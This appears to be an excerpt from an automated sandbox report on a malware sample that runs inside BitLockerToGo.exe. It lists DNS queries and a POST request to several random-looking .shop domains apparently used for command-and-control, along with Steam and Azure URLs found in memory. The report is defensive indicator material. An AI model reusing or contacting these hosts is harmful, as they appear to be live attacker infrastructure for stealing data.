            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.000000000061D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: global trafficDNS traffic detected: DNS query: nippydxmnwquo.shop
            Source: global trafficDNS traffic detected: DNS query: locatedblsoqp.shop
            Source: global trafficDNS traffic detected: DNS query: traineiwnqo.shop
            Source: global trafficDNS traffic detected: DNS query: condedqpwqm.shop
            Source: global trafficDNS traffic detected: DNS query: evoliutwoqm.shop
            Source: global trafficDNS traffic detected: DNS query: millyscroqwp.shop
            Source: global trafficDNS traffic detected: DNS query: stagedchheiqwo.shop
            Source: global trafficDNS traffic detected: DNS query: stamppreewntnq.shop
            Source: global trafficDNS traffic detected: DNS query: caffegclasiqwp.shop
            Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
            Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: nippydxmnwquo.shop
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
            Source: BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caffegclasiqwp.shop/
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caffegclasiqwp.shop/B
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caffegclasiqwp.shop/pi
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caffegclasiqwp.shop/wq
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
            Source: BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://datalake.azure.net/https://api.loganalytics.iohttps://graph.microsoft.us/https://api.loganal
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://gallery.azure.com/https://graph.windows.net/mariadb.database.azure.comhttps://storage.azure.
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locatedblsoqp.shop/
            Source: BitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locatedblsoqp.shop/=z
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locatedblsoqp.shop/api
            Source: BitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locatedblsoqp.shop/apiBY
            Source: BitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locatedblsoqp.shop/m
            Source: BitLockerToGo.exe, 00000002.00000003.1636364105.000000000061D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.s
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettin
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://manage.windowsazure.com/publishsettings/indexcrypto/elliptic:
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://manage.windowsazure.us/publishsettings/indexConvertSecurityDescriptorToStringSecurityDescrip
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://management.azure.com/https://managedhsm.azure.net/https://servicebus.azure.net/https://datab
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://management.core.usgovcloudapi.net/https://dev.azuresynapse.usgovcloudapi.netinsufficient
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://management.core.windows.net/https://management.chinacloudapi.cn/https://servicebus.chinaclou
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://management.usgovcloudapi.net/https://servicebus.usgovcloudapi.net/https://batch.core.usgovcl
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://microsoftgraph.chinacloudapi.cn/crypto/rsa:
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://microsoftgraph.chinacloudapi.cngo
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://millyscroqwp.shop/apin
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nippydxmnwquo.shop/api
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://ossrdbms-aad.database.chinacloudapi.cnfirst
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://ossrdbms-aad.database.usgovcloudapi.netRtlDosPathNameToRelativeNtPathName_U_WithStatusinvali
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: https://ossrdbms-aad.database.windows.nethttps://management.core.chinacloudapi.cn/https://ossrdbms-a
